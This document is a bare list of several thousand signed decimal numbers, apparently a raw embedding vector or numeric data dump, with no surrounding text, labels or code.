-0.0038397987373173237, -0.012326258234679699, 0.03149643540382385, -0.05356987565755844, -0.030257325619459152, -0.0014732435811311007, -0.011332089081406593, -0.01664152927696705, -0.00072086276486516, 0.006483712699264288, 0.0047439164482057095, 0.042619604617357254, -0.059419624507427216, 0.006710642483085394, -0.030055610463023186, 0.0028168128337711096, 0.04956438019871712, 0.005309440195560455, 0.005176163744181395, -0.003166212933138013, -0.05936199054121971, 0.01321236602962017, -0.021986989304423332, -0.0003203584346920252, -0.017664514482021332, -0.05648034065961838, -0.03230329602956772, -0.042994219809770584, -0.013464509509503841, 0.010698125697672367, -0.006721448618918657, -0.009343750774860382, -0.024580474942922592, 0.03391702100634575, 0.010431572794914246, -0.011526600457727909, 0.02073347195982933, 0.0048123556189239025, 0.024724557995796204, -0.009329342283308506, 0.02084873802959919, -0.013795900158584118, 0.0009311331668868661, 0.042763687670230865, 0.011620254255831242, 0.02453725039958954, 0.006505324970930815, -0.023384589701890945, -0.012556790374219418, -0.015460052527487278, 0.03394583612680435, -0.006541345734149218, 0.0011112362844869494, -0.011944439262151718, 0.008760216645896435, 0.012189379893243313, 0.03463743254542351, 0.007665188983082771, 0.008983544073998928, 0.016209281980991364, -0.0050536938942968845, -0.011382517404854298, -0.043858714401721954, 0.04420451074838638, -0.0009617506875656545, -0.010445981286466122, -0.007730026263743639, -0.011922826990485191, 0.023759204894304276, 0.015892300754785538, -0.01677120290696621, 0.017232267186045647, -0.01874513365328312, 0.020762288942933083, 0.018529009073972702, -0.01688646897673607, 0.010309102945029736, 0.03567482903599739, -0.00656655989587307, 0.0357324592769146, 0.002584479982033372, -0.03244737908244133, -0.03048785775899887, 0.05475135147571564, -0.020891962572932243, -0.0616673119366169, -0.011598641984164715, 0.041870374232530594, 0.034752700477838516, -0.009581486694514751, 0.028413070365786552, -0.04821000620722771, -0.014660394750535488, -0.006512529216706753, -0.0008870079182088375, 0.008608929812908173, 0.008385601453483105, 0.03365767374634743, 0.015892300754785538, -0.0025988882407546043, 0.030776022002100945, -0.0027789913583546877, 0.022606544196605682, -0.0005286026862449944, -0.010265878401696682, 0.01655508019030094, 0.03602062538266182, 0.005554380360990763, -0.010438777506351471, 0.010582859627902508, -0.026698488742113113, 0.025862809270620346, -0.012902588583528996, -0.012427115812897682, -0.013601388782262802, 0.03259146213531494, -0.005194174125790596, 0.007967762649059296, -0.018471376970410347, 0.022015806287527084, 0.02613656595349312, -0.0321015827357769, -0.00394425867125392, 0.03365767374634743, 0.013867940753698349, -0.0055147577077150345, -0.03627997264266014, -0.028600376099348068, -0.025934850797057152, -0.0665661171078682, -0.021785274147987366, 0.022779444232583046, -0.006703438702970743, 0.015460052527487278, -0.04037191718816757, -0.012002072297036648, 0.00468628341332078, -0.026929019019007683, -0.01350773498415947, -0.00783808808773756, 0.015128662809729576, -0.023643938824534416, -0.02849951945245266, 0.02247687056660652, -0.01375267468392849, -0.013140324503183365, 0.025272071361541748, -0.031784601509571075, -0.030660755932331085, -0.014091269113123417, 0.048065923154354095, 0.014588353224098682, -0.004261239897459745, -0.011454558931291103, -0.02060379832983017, -0.010590064339339733, 0.008918707258999348, 0.04463675990700722, 0.05031361058354378, -0.03714447095990181, 0.0075211068615317345, -0.02750534936785698, 0.008558500558137894, 0.013939982280135155, 0.011512191966176033, -0.017808597534894943, -0.033023711293935776, 0.03674103692173958, -0.011598641984164715, -0.004855580162256956, 0.0024097799323499203, -0.021670008078217506, -0.004520588554441929, -0.021886132657527924, -0.01741957478225231, -0.004444945137947798, 0.02579076774418354, 0.015949932858347893, 0.008111844770610332, 0.006411671172827482, -0.021295394748449326, 0.024119410663843155, 0.02934960648417473, 0.03999730199575424, -0.01061167661100626, -0.060284119099378586, -0.0026024901308119297, 0.012563994154334068, -0.010597268119454384, -0.01837051846086979, 0.059534888714551926, -0.006840317044407129, 0.01839933544397354, -0.006310813594609499, 0.03293725848197937, -0.020041875541210175, 0.028542743995785713, -0.027937596663832664, -0.04529953747987747, 0.04639456793665886, 0.011894010938704014, -0.00994169246405363, 0.038441210985183716, -0.025833992287516594, 0.000015970083040883765, -0.023009976372122765, -0.01753484085202217, -0.012319054454565048, 0.012945813126862049, -0.010813391767442226, 0.013997615315020084, 0.016310138627886772, -0.0013552760938182473, -0.02507035620510578, -0.018932441249489784, 0.020791105926036835, 0.012297441251575947, 0.01999865099787712, 0.022188706323504448, -0.014048043638467789, 0.017491616308689117, -0.010251469910144806, -0.008284743875265121, -0.000035711072996491566, -0.011994868516921997, 0.015820259228348732, -0.01350773498415947, 0.0006978996098041534, -0.029464872553944588, 0.015517685562372208, 0.005777708254754543, -0.00907719787210226, 0.011065536178648472, 0.030516674742102623, -0.05728720501065254, 0.005590401124209166, -0.007874108850955963, 0.013824716210365295, -0.017678923904895782, 0.027188368141651154, -0.0012652245350182056, 0.004556609317660332, -0.011865193955600262, -0.0007780455052852631, -0.00604786304756999, 0.01424975972622633, -0.006462100427597761, 0.03432045131921768, -0.033744122833013535, -0.000730768428184092, 0.011368109844624996, 0.0006591774290427566, 0.006307211704552174, -0.002742970595136285, 0.02874445915222168, -0.010042550042271614, -0.00462865037843585, -0.021986989304423332, -0.0038181862328201532, 0.0228226687759161, -0.0289749912917614, -0.017318716272711754, -0.010035346262156963, -0.00010108287824550644, 0.02727481722831726, -0.008861074224114418, -0.013233978301286697, -0.006807898171246052, -0.014206535182893276, 0.015704993158578873, 0.013025058433413506, -0.02269299514591694, -0.0029951150063425303, -0.02815372124314308, -0.0044485474936664104, 0.020430898293852806, 0.022419238463044167, -0.01481168158352375, -0.009480629116296768, -0.0028942571952939034, 0.011404130607843399, -0.02391769550740719, -0.014955763705074787, 0.022808261215686798, -0.009891264140605927, -0.004297260660678148, 0.01664152927696705, -0.014350617304444313, 0.002744771772995591, 0.009271709248423576, 0.004700691904872656, 0.003189626382663846, -0.024119410663843155, 0.028773276135325432, 0.011094353161752224, -0.039536237716674805, -0.024133820086717606, 0.019321464002132416, 0.03417636826634407, -0.007247349712997675, -0.008529684506356716, 0.027058694511651993, 0.02022918313741684, 0.03097773902118206, 0.029565729200839996, -0.023125242441892624, 0.02750534936785698, -0.008529684506356716, -0.003983881324529648, 0.03380175679922104, -0.029565729200839996, 0.004664671141654253, 0.02383124642074108, -0.04241788759827614, 0.01226862519979477, -0.01763569749891758, 0.03169815242290497, 0.028701234608888626, -0.004293658770620823, 0.0000977059462456964, -0.0036524913739413023, 0.0032724738121032715, -0.012880975380539894, 0.014840497635304928, 0.012556790374219418, -0.035473112016916275, -0.0064657023176550865, 0.01277291402220726, 0.03527139499783516, 0.011202414520084858, -0.012297441251575947, 0.006249578669667244, -0.015560910105705261, 0.020805513486266136, -0.03835476189851761, 0.0026547200977802277, -0.03120827116072178, 0.004675477277487516, 0.02592044323682785, 0.004671875387430191, 0.024738965556025505, 0.02885972522199154, -0.021381843835115433, -0.0069339703768491745, 0.011634661816060543, 0.011569825001060963, 0.027937596663832664, -0.017851822078227997, 0.025473786517977715, 0.0518408864736557, -0.002975303679704666, -0.0029662984889000654, -0.034867964684963226, -0.02358630672097206, -0.04970846325159073, 0.009920080192387104, 0.013269998133182526, 0.007823679596185684, -0.015877891331911087, -0.02086314558982849, 0.020214775577187538, 0.02022918313741684, -0.012520769611001015, -0.00229811598546803, -0.017823005095124245, -0.0036038635298609734, -0.01789504662156105, -0.021367434412240982, 0.02651118114590645, 0.029436055570840836, -0.022131072357296944, 0.012852159328758717, -0.0028978593181818724, 0.008090232498943806, 0.0197393037378788, 0.004052320495247841, -0.03515613079071045, 0.0017244875198230147, -0.027116326615214348, -0.004783539101481438, -0.030055610463023186, -0.011922826990485191, 0.038815826177597046, -0.030631940811872482, 0.018788358196616173, 0.0120308892801404, 0.015258337371051311, -0.04489610716700554, 0.04140930995345116, -0.012873771600425243, -0.019941018894314766, -0.009185259230434895, -0.011036720126867294, 0.02120894379913807, -0.005204980261623859, 0.005334654822945595, 0.005561584606766701, 0.022635361179709435, 0.004459353629499674, -0.003567842999473214, 0.013594184070825577, 0.004016299732029438, -0.012808934785425663, 0.002573673613369465, -0.0419568233191967, 0.03305252641439438, 0.019696077331900597, -0.012304645963013172, 0.0008811545558273792, 0.022433646023273468, -0.016382180154323578, 0.012138950638473034, -0.039795588701963425, -0.04478084295988083, -0.021900540217757225, -0.036827489733695984, 0.012844955548644066, 0.0035588378086686134, -0.00429005641490221, 0.006429681554436684, 0.0015020600985735655, 0.02207344025373459, -0.008745808154344559, -0.03083365596830845, 0.01276571024209261, 0.010546838864684105, -0.015315970405936241, -0.001810036483220756, 0.023009976372122765, -0.01639658957719803, 0.012383891269564629, 0.0076363724656403065, 0.006951980758458376, -0.02417704463005066, 0.027966413646936417, -0.025747543200850487, -0.014854906126856804, 0.011332089081406593, -0.013255590572953224, 0.024998314678668976, -0.02184290811419487, 0.034378085285425186, 0.01716022565960884, 0.008212702348828316, 0.010157816112041473, -0.00700601190328598, -0.017693331465125084, 0.004001891706138849, 0.018226437270641327, 0.006616989150643349, 0.008832257241010666, -0.028081679716706276, -0.005543574225157499, 0.01775096356868744, -0.010445981286466122, 0.013846328482031822, 0.030891288071870804, -0.013889553025364876, 0.026122158393263817, -0.0017001735977828503, 0.020459715276956558, 0.015719400718808174, 0.021367434412240982, 0.003382336813956499, -0.02568991109728813, -0.008702583611011505, 0.018212027847766876, -0.02419145219027996, -0.0019541189540177584, 0.03553074598312378, 0.005168959964066744, 0.029162298887968063, -0.024854231625795364, -0.003746145172044635, -0.024148227646946907, 0.035213764756917953, -0.00266912835650146, -0.00981922261416912, 0.01239109504967928, -0.018197620287537575, 0.009761589579284191, 0.005662442184984684, 0.01165627408772707, -0.005792116746306419, 0.04550125449895859, -0.005925392732024193, 0.023240508511662483, -0.03921925649046898, -0.006750265136361122, 0.009358158335089684, -0.011130372993648052, -0.009703956544399261, 0.01357257179915905, 0.006181139498949051, -0.025704318657517433, -0.02996916137635708, -0.013003446161746979, -0.009761589579284191, 0.000251468998612836, 0.009610302746295929, -0.017333125695586205, 0.02947928011417389, -0.012427115812897682, -0.0022927129175513983, 0.010482002049684525, 0.007621964439749718, 0.000597492151428014, -0.009271709248423576, 0.023903287947177887, -0.0007253653602674603, 0.013716653920710087, 0.025819584727287292, -0.009920080192387104, -0.008068620227277279, -0.012110134586691856, -0.040775347501039505, -0.010402756743133068, -0.021655600517988205, 0.04207209125161171, 0.018687501549720764, -0.004520588554441929, 0.024494025856256485, -0.0028402262832969427, -0.021914949640631676, -0.00098606466781348, -0.002571872668340802, -0.007679597474634647, 0.026194199919700623, -0.004646660760045052, 0.009422996081411839, -0.02430671826004982, 0.05158153548836708, 0.005720075219869614, -0.004567415453493595, -0.006966389250010252, 0.0012030889047309756, -0.027577390894293785, -0.048296455293893814, -0.01628132350742817, 0.005536369979381561, 0.010287490673363209, -0.010143408551812172, 0.03734618425369263, 0.010186633095145226, -0.010453185997903347, 0.016310138627886772, -0.011649070307612419, 0.01826966181397438, -0.005590401124209166, -0.00548594119027257, 0.011569825001060963, -0.0246669240295887, 0.02616538293659687, 0.013947186060249805, 0.00022231480397749692, 0.009631915017962456, 0.035329028964042664, 0.010100183077156544, 0.0012670254800468683, -0.04944911599159241, 0.014725231565535069, -0.0166703462600708, -0.01901889033615589, 0.0065701622515916824, 0.019465547055006027, 0.01838492788374424, -0.016727978363633156, -0.01923501491546631, 0.0034867965150624514, -0.0019991446752101183, -0.00014790969726163894, 0.04123641178011894, -0.004754722584038973, 0.016338955610990524, -0.032505013048648834, -0.0023737591691315174, 0.008652154356241226, -0.05489543452858925, -0.005658840294927359, -0.0019217004301026464, -0.020387673750519753, -0.018356110900640488, 0.0022765034809708595, 0.01936468854546547, -0.033859387040138245, -0.032130397856235504, 0.013824716210365295, 0.04532835632562637, -0.018111171200871468, -0.025099171325564384, -0.044982556253671646, 0.0009446408948861063, -0.011728315614163876, -0.0019325065659359097, 0.011814765632152557, 0.0020783902145922184, -0.00629640556871891, -0.006447691936045885, 0.04737432673573494, 0.011519395746290684, 0.00737702427431941, 0.014545128680765629, 0.00895472802221775, -0.010806187987327576, 0.010460389778017998, -0.034378085285425186, -0.007074451074004173, 0.02802404761314392, -0.028398660942912102, 0.017203450202941895, -0.00749949412420392, 0.030314959585666656, -0.014617170207202435, -0.0025106375105679035, -0.026338281109929085, 0.01691528595983982, 0.004891600925475359, -0.005871362052857876, -0.016497446224093437, 0.0019090931164100766, -0.0011220425367355347, -0.0073410035111010075, -0.0055831968784332275, 0.0020261602476239204, 0.003998289350420237, 0.009286117739975452, 0.0005659741000272334, -0.0024692139122635126, -0.030776022002100945, 0.007967762649059296, -0.03383057191967964, -0.04391634836792946, -0.02047412283718586, 0.0015975147252902389, 0.023240508511662483, -0.0185146015137434, -0.004996060859411955, 0.001223800820298493, 0.012722484767436981, -0.018284069374203682, 0.009163646958768368, -0.0067070405930280685, -0.023053200915455818, -0.014271371997892857, 0.006530539598315954, 0.003969472832977772, -0.006177537143230438, 0.03838358074426651, -0.031121820211410522, -0.011065536178648472, -0.01813998632133007, 0.02370157092809677, 0.016727978363633156, 0.019076524302363396, -0.013558163307607174, -0.015532094053924084, 0.013666225597262383, 0.01812557876110077, -0.04760485887527466, 0.0036524913739413023, 0.0019180983072146773, -0.008594521321356297, -0.0011607647174969316, 0.02568991109728813, 0.02195817418396473, 0.02259213663637638, -0.030199693515896797, 0.0033211016561836004, -0.016324548050761223, -0.01035232748836279, 0.004383710213005543, 0.008313560858368874, -0.007067246828228235, 0.010482002049684525, 0.01677120290696621, 0.0015020600985735655, -0.005633625667542219, -0.022736219689249992, 0.015474461019039154, 0.049910180270671844, -0.027044285088777542, -0.01239109504967928, -0.006779081653803587, 0.003908237908035517, 0.00845764297991991, -0.024349942803382874, -0.0013309621717780828, 0.01802472025156021, 0.006134312599897385, -0.012866567820310593, -0.029825078323483467, -0.019422320649027824, -0.025084763765335083, -0.013025058433413506, 0.025142397731542587, -0.0018982869805768132, -0.02393210306763649, -0.001855062204413116, -0.01159143727272749, 0.007319391239434481, -0.0141921266913414, -0.03195749968290329, -0.024854231625795364, 0.040516000241041183, 0.012499157339334488, -0.018428152427077293, 0.0048195598646998405, -0.03109300509095192, 0.000983363133855164, -0.0015795044600963593, 0.006836714688688517, 0.033513590693473816, -0.02453725039958954, 0.0006159527110867202, -0.028355436399579048, -0.012441524304449558, 0.0036110677756369114, 0.032389745116233826, 0.0006123506464064121, 0.0011607647174969316, 0.0076435767114162445, -0.0043981182388961315, 0.006653009448200464, 0.002811409765854478, 0.003519215155392885, -0.025862809270620346, -0.006609784904867411, -0.014674803242087364, 0.014638782478868961, -0.015416827984154224, -0.03221684694290161, 0.007607556413859129, 0.030516674742102623, 0.004203606862574816, -0.027836740016937256, -0.0017451993189752102, 0.005590401124209166, 0.022635361179709435, 0.011216823011636734, -0.01642540469765663, 0.004236025735735893, -0.011541008949279785, 0.01947995461523533, 0.01215335913002491, 0.057805899530649185, -0.026194199919700623, 0.001207591500133276, -0.0070024095475673676, -0.002769986167550087, -0.012981833890080452, -0.011123169213533401, 0.0008987146429717541, -0.013241182081401348, -0.015517685562372208, -0.0021630385890603065, -0.040544815361499786, -0.03587654232978821, 0.010143408551812172, -0.0027771901804953814, -0.0012454130919650197, 0.0032202438451349735, -0.01593552529811859, 0.01680001989006996, 0.017333125695586205, -0.010143408551812172, -0.0055147577077150345, 0.03397465497255325, -0.025099171325564384, 0.027793515473604202, 0.011857990175485611, -0.02442198432981968, -0.03527139499783516, -0.0009221280342899263, -0.007283370476216078, -0.021439475938677788, 0.009718365035951138, -0.04259078949689865, 0.008248723112046719, 0.013147528283298016, -0.005860555917024612, 0.00012764809071086347, -0.014826089143753052, -0.015474461019039154, -0.020791105926036835, 0.0060514649376273155, -0.01642540469765663, -0.014530720189213753, -0.008414418436586857, 0.02848511002957821, 0.08708346635103226, -0.020070692524313927, 0.012362278997898102, -0.024364352226257324, 0.015258337371051311, 0.003847002750262618, 0.02123776078224182, 0.012297441251575947, -0.005496747326105833, 0.0185146015137434, 0.014667598530650139, -0.010100183077156544, -0.010179429315030575, 0.036712221801280975, 0.021554742008447647, -0.006220762152224779, -0.01357257179915905, -0.014098472893238068, 0.03636642545461655, -0.010510819032788277, 0.0036723027005791664, 0.01580584980547428, -0.008219907060265541, -0.025027131661772728, 0.04553006961941719, -0.011577028781175613, -0.010258674621582031, -0.022808261215686798, -0.036337606608867645, -0.010460389778017998, 0.00013564016262535006, -0.02851392701268196, -0.014955763705074787, -0.019897794350981712, -0.00045948810293339193, 0.0010436975862830877, 0.016065198928117752, 0.002152232453227043, -0.019105339422822, -0.010683717206120491, -0.00595781160518527, -0.020661430433392525, -0.009026768617331982, -0.008853869512677193, 0.01655508019030094, -0.01985456980764866, 0.014523516409099102, 0.0005461627151817083, -0.007744434755295515, -0.006350436247885227, 0.0036524913739413023, -0.014941355213522911, 0.01677120290696621, 0.011649070307612419, 0.006343232002109289, 0.015200704336166382, 0.0043512918055057526, -0.022303972393274307, -0.010251469910144806, -0.023600714281201363, -0.0044485474936664104, 0.007593147922307253, -0.0419280081987381, 0.022289562970399857, -0.0038325944915413857, -0.005925392732024193, -0.02096400409936905, 0.03296607732772827, -0.03285080939531326, 0.008767420426011086, 0.006829510442912579, 0.01626691408455372, 0.014401046559214592, -0.003245458472520113, 0.0037749616894870996, 0.019912201911211014, 0.01899007335305214, 0.029882710427045822, -0.022635361179709435, 0.0007451766869053245, 0.035473112016916275, 0.014667598530650139, -0.006944776512682438, 0.012506361119449139, -0.009639119729399681, 0.04553006961941719, -0.04204327613115311, -0.009300525300204754, -0.0040955450385808945, -0.009286117739975452, -0.00406672852113843, 0.015517685562372208, 0.011195210739970207, 0.0033283059019595385, 0.02653999626636505, 0.021280985325574875, 0.0135797755792737, -0.010755758732557297, -0.02790878154337406, -0.010842208750545979, -0.011504988186061382, -0.006065873429179192, 0.018543418496847153, -0.011137577705085278, -0.0031301924027502537, -0.0038722173776477575, -0.003027533646672964, 0.02507035620510578, 0.007247349712997675, -0.00895472802221775, -0.03976676985621452, -0.0061018941923975945, 0.024522842839360237, 0.0004428285756148398, -0.007330197375267744, 0.026684079319238663, -0.00187487353105098, -0.010381144471466541, -0.0006267589051276445, -0.04057363420724869, -0.030660755932331085, -0.010532431304454803, 0.05143745243549347, -0.014401046559214592, -0.004243229515850544, 0.000296269659884274, -0.004023503977805376, -0.019840160384774208, 0.014595557935535908, 0.013205161318182945, 0.04259078949689865, -0.00000970164910540916, 0.011123169213533401, -0.014473087154328823, 0.0051149288192391396, -0.012902588583528996, 0.02494068071246147, -0.0065269372425973415, -0.008327968418598175, 0.0092573007568717, -0.002463810844346881, 0.012016480788588524, 0.027490941807627678, 0.002391769550740719, 0.00022287762840278447, -0.013716653920710087, 0.004801549483090639, 0.002782593248412013, 0.01739075779914856, 0.0040955450385808945, -0.013550959527492523, -0.04653864726424217, 0.016699161380529404, 0.025617869570851326, 0.005183367989957333, 0.01615164801478386, 0.007694005500525236, -0.002269299468025565, 0.001988338539376855, 0.003850604873150587, -0.00005093541767564602, -0.020330041646957397, 0.011649070307612419, 0.01381030771881342, -0.012239808216691017, 0.036452874541282654, 0.013277202844619751, -0.056710872799158096, -0.02308201789855957, -0.007258156314492226, 0.019667262211441994, -0.009358158335089684, -0.016569487750530243, 0.015949932858347893, 0.012254216708242893, -0.0011571625946089625, -0.02579076774418354, 0.019292647019028664, 0.030574306845664978, -0.02675612084567547, 0.0008253225823864341, 0.009905671700835228, 0.014379434287548065, -0.006022648420184851, -0.0028744458686560392, -0.028398660942912102, -0.03267791122198105, 0.009639119729399681, -0.0394497886300087, 0.013738267123699188, 0.014739640057086945, 0.04403161257505417, -0.005532768089324236, 0.011613049544394016, 0.015258337371051311, -0.014465883374214172, 0.0033931429497897625, -0.015460052527487278, -0.004048718139529228, -0.010388348251581192, -0.008558500558137894, -0.012636035680770874, 0.006807898171246052, 0.01642540469765663, -0.013767083175480366, -0.0185001939535141, -0.004797947593033314, 0.007031226065009832, 0.002310723066329956, 0.0022350798826664686, 0.00397667707875371, 0.003911839798092842, -0.019710486754775047, 0.00937977060675621, -0.002245886018499732, 0.014854906126856804, 0.0012373084900900722, -0.03898872435092926, 0.004862784408032894, 0.014170514419674873, -0.0025106375105679035, 0.02148270048201084, -0.00238816742785275, 0.0129530169069767, -0.005532768089324236, 0.008198294788599014, 0.020690247416496277, -0.03489678353071213, -0.010129000060260296, 0.03360003978013992, -0.02763502486050129, -0.019321464002132416, -0.00737702427431941, 0.014048043638467789, 0.001109435223042965, -0.02246246300637722, 0.01618046499788761, 0.016972918063402176, 0.012369482778012753, -0.004898805171251297, 0.005266215652227402, -0.0028366243932396173, -0.010028142482042313, -0.00453859893605113, -0.005262613296508789, -0.0002442648692522198, 0.019969835877418518, -0.00044688087655231357, -0.021194536238908768, 0.052157867699861526, -0.010626084171235561, -0.002008149866014719, 0.004869988653808832, -0.014379434287548065, -0.009444608353078365, 0.028960583731532097, -0.0010355929844081402, 0.002040568506345153, 0.007413044571876526, 0.013097099959850311, -0.009956100955605507, -0.014653190970420837, 0.00502487737685442, 0.0023161261342465878, -0.021194536238908768, 0.029162298887968063, -0.007629168685525656, -0.010654901154339314, 0.007384228520095348, -0.02515680529177189, 0.004610639996826649, -0.0021378241945058107, -0.0006798892864026129, -0.015474461019039154, 0.004599833860993385, -0.005323848687112331, 0.009163646958768368, -0.011598641984164715, 0.001979333348572254, -0.005954209249466658, -0.011144781485199928, 0.030776022002100945, 0.0026961439289152622, -0.014033636078238487, 0.014595557935535908, -0.031237086281180382, -0.022289562970399857, -0.025488194078207016, -0.012131746858358383, -0.007463473826646805, -0.0037713595665991306, 0.027476534247398376, 0.003756951307877898, -0.015460052527487278, 0.03754790127277374, 0.008140661753714085, -0.019090931862592697, 0.001968527212738991, -0.012427115812897682, 0.0010788177605718374, -0.006998807657510042, 0.04763367399573326, 0.03184223175048828, -0.005950607359409332, -0.016310138627886772, 0.003148202784359455, -0.010460389778017998, 0.00567685067653656, 0.0024962294846773148, -0.04532835632562637, -0.003515613032504916, 0.010215449146926403, -0.024032961577177048, -0.024825414642691612, 0.008486459031701088, -0.0039046357851475477, 0.009603098966181278, -0.006923164241015911, -0.016338955610990524, 0.0005358068156056106, 0.005550778470933437, 0.0002038542297668755, -0.02481100708246231, -0.012556790374219418, -0.016727978363633156, 0.012736893258988857, 0.01826966181397438, 0.006649407558143139, -0.0045710173435509205, -0.004769131075590849, 0.026799345389008522, 0.014638782478868961, 0.010899841785430908, -0.01074135024100542, 0.0006317117367871106, 0.005413900129497051, 0.019566403701901436, 0.013154732994735241, 0.0025592653546482325, -0.0027123531326651573, -0.03109300509095192, 0.02541615441441536, -0.009178055450320244, 0.026856979355216026, 0.021641191095113754, 0.008018190972507, 0.00576690211892128, 0.009682344272732735, 0.0036236748564988375, -0.025877216830849648, -0.0038686152547597885, -0.003521016100421548, -0.01363020483404398, 0.012801730073988438, 0.005233796779066324, -0.0003455728874541819, 0.005003265105187893, 0.01301785372197628, 0.027087511494755745, -0.013025058433413506, -0.006256782915443182, 0.01288818009197712, -0.010345123708248138, 0.010575655847787857, -0.004466557409614325, -0.017736556008458138, 0.01443706639111042, 0.02244805358350277, 0.028196945786476135, -0.02123776078224182, -0.01590670831501484, 0.011994868516921997, 0.01357257179915905, 0.015719400718808174, 0.02469574101269245, -0.004808753728866577, 0.022159889340400696, -0.01861546002328396, -0.014465883374214172, 0.0419856421649456, 0.011483375914394855, -0.00943019986152649, 0.00044350395910441875, -0.004974448587745428, -0.0019126952392980456, 0.007315788883715868, -0.009855243377387524, 0.012311849743127823, -0.010136203840374947, -0.008918707258999348, -0.0092573007568717, 0.015863483771681786, 0.004135167691856623, 0.019681669771671295, 0.013896757736802101, 0.011188006028532982, -0.006606183014810085, -0.012499157339334488, -0.02060379832983017, -0.0025934851728379726, 0.02469574101269245, 0.007686801720410585, 0.01437222957611084, 0.015042213723063469, 0.011166393756866455, 0.016310138627886772, 0.007092461455613375, -0.003850604873150587, 0.031064188107848167, -0.013594184070825577, 0.013968798331916332, -0.001077016699127853, 0.008227110840380192, -0.002301718108355999, -0.04233143851161003, 0.013291611336171627, 0.015272744931280613, 0.025833992287516594, -0.010157816112041473, 0.0016686555463820696, 0.00706364493817091, -0.03391702100634575, -0.02950809709727764, -0.023514265194535255, 0.0022404829505831003, -0.007528310641646385, -0.004145973827689886, -0.004534996580332518, 0.000030701954528922215, -0.01221819594502449, 0.0009608502150513232, 0.0036434864159673452, 0.01947995461523533, -0.01654067076742649, 0.02813931368291378, 0.01950877159833908, -0.03907517343759537, -0.02999797649681568, -0.009235688485205173, 0.00013001194747630507, 0.002272901590913534, -0.011224026791751385, -0.009898467920720577, 0.0034940007608383894, -0.022793851792812347, -0.0209928210824728, -0.016137240454554558, -0.012859363108873367, -0.020459715276956558, 0.006804296281188726, 0.015704993158578873, 0.013255590572953224, 0.012016480788588524, 0.028931766748428345, 0.006188343744724989, 0.008536888286471367, 0.007373421918600798, -0.004088341258466244, -0.004902407061308622, -0.00025664694840088487, 0.0104964105412364, -0.011332089081406593, 0.026223015040159225, 0.007910129614174366, 0.0135797755792737, -0.002676332602277398, -0.00749949412420392, 0.0013003445928916335, -0.0052482052706182, 0.006962786894291639, 0.019148563966155052, -0.0049348259344697, 0.007881312631070614, -0.009948897175490856, 0.0020189560018479824, -0.014141697436571121, -0.0043512918055057526, -0.009581486694514751, -0.00851527601480484, -0.016497446224093437, 0.007686801720410585, 0.0002498930844012648, -0.01277291402220726, 0.009235688485205173, -0.015445644035935402, 0.014264168217778206, -0.008111844770610332, -0.015330377966165543, 0.007859700359404087, 0.023658346384763718, 0.0030581511091440916, 0.00875301193445921, 0.014408250339329243, 0.006609784904867411, 0.03429163619875908, 0.019090931862592697, 0.01788063906133175, 0.03434927016496658, 0.010258674621582031, -0.014638782478868961, 0.011137577705085278, 0.010013733990490437, 0.007794863544404507, 0.007982171140611172, -0.0020945994183421135, 0.002795200562104583, -0.02022918313741684, -0.0005884869606234133, 0.005161755718290806, -0.014040839858353138, -0.00022895610891282558, -0.010316307656466961, -0.006642203312367201, -0.011180802248418331, -0.01776537299156189, 0.008327968418598175, 0.006944776512682438, -0.0026565210428088903, -0.010107387788593769, 0.001786623033694923, 0.009775998070836067, 0.022419238463044167, -0.012376687489449978, -0.025200029835104942, 0.004293658770620823, 0.011058332398533821, 0.03083365596830845, 0.008731399662792683, -0.00496724434196949, -0.02107927016913891, 0.0035570368636399508, 0.012117338366806507, -0.008594521321356297, 0.0012292038882151246, 0.004030708223581314, 0.00045746195246465504, 0.006116302218288183, -0.01517188735306263, -0.0017127807950600982, -0.009005156345665455, 0.019523179158568382, -0.02985389530658722, 0.012362278997898102, 0.021554742008447647, 0.015733810141682625, -0.0053922878578305244, -0.009711160324513912, -0.0024331933818757534, -0.007384228520095348, 0.0012742296094074845, 0.004394516348838806, -0.0008163174497894943, -0.0015452848747372627, -0.023788021877408028, 0.001041896641254425, 0.013082691468298435, 0.010287490673363209, 0.012585606426000595, 0.018226437270641327, 0.010748554952442646, 0.004513384308665991, -0.006840317044407129, 0.029263155534863472, -0.005035683512687683, 0.014379434287548065, 0.024220269173383713, -0.0030941718723624945, 0.009033973328769207, -0.010712534189224243, 0.00005360882278182544, -0.0019415117567405105, 0.001858664327301085, -0.011814765632152557, 0.005385083612054586, -0.013262794353067875, 0.01936468854546547, 0.006829510442912579, -0.023471040651202202, -0.008342376910150051, 0.010503614321351051, 0.019148563966155052, -0.004956438206136227, -0.03348477557301521, -0.015978749841451645, -0.009394179098308086, -0.011303272098302841, 0.01505662128329277, -0.011627458035945892, -0.020906371995806694, -0.014278575778007507, 0.003337311092764139, 0.023355774581432343, -0.02096400409936905, 0.009538262151181698, -0.014329005032777786, -0.026871386915445328, -0.015330377966165543, -0.012167767621576786, -0.008825053460896015, 0.015877891331911087, -0.016324548050761223, 0.011526600457727909, -0.00937256682664156, -0.004668273031711578, -0.03074720688164234, -0.0022837077267467976, 0.02666967175900936, 0.006300007458776236, -0.009848038665950298, -0.0037641553208231926, 0.008111844770610332, 0.0032112388871610165, -0.007463473826646805, 0.001790225156582892, 0.0026078931987285614, -0.012203788384795189, 0.013262794353067875, -0.007730026263743639, -0.006141516845673323, -0.04034310206770897, 0.00783088430762291, -0.005464328918606043, -0.0063360282219946384, 0.012074113823473454, -0.013442897237837315, 0.012009277008473873, 0.018831582739949226, -0.05218668282032013, 0.013997615315020084, 0.000746977748349309, -0.00038429503911174834, 0.0037749616894870996, 0.011065536178648472, 0.014091269113123417, -0.0022999169304966927, 0.03901754319667816, 0.0048807947896420956, -0.015964342281222343, 0.00499966274946928, 0.008227110840380192, -0.0034453729167580605, -0.010078570805490017, -0.01564735919237137, -0.0018982869805768132, -0.003908237908035517, 0.022116664797067642, 0.011101556941866875, 0.005183367989957333, -0.005860555917024612, 0.013795900158584118, 0.002060379832983017, 0.022548912093043327, -0.01135370135307312, 0.010395552963018417, 0.01425696350634098, -0.007121277507394552, -0.0016317343106493354, 0.019652852788567543, 0.011303272098302841, -0.001939710695296526, 0.01333483587950468, 0.01937909610569477, -0.0026349087711423635, -0.003196830628439784, -0.0037029203958809376, 0.00221887044608593, -0.013846328482031822, 0.0203444492071867, 0.01887480728328228, -0.0035012047737836838, -0.012924200855195522, 0.015330377966165543, -0.018601050600409508, 0.0030815645586699247, -0.016238098964095116, -0.0043981182388961315, 0.0015695987967774272, -0.012304645963013172, -0.008068620227277279, -0.008594521321356297, 0.015978749841451645, -0.005579594988375902, -0.0005902880220673978, 0.006714244838804007, -0.012045296840369701, -0.02824017032980919, -0.004974448587745428, -0.006512529216706753, -0.004059524741023779, -0.0027555779088288546, 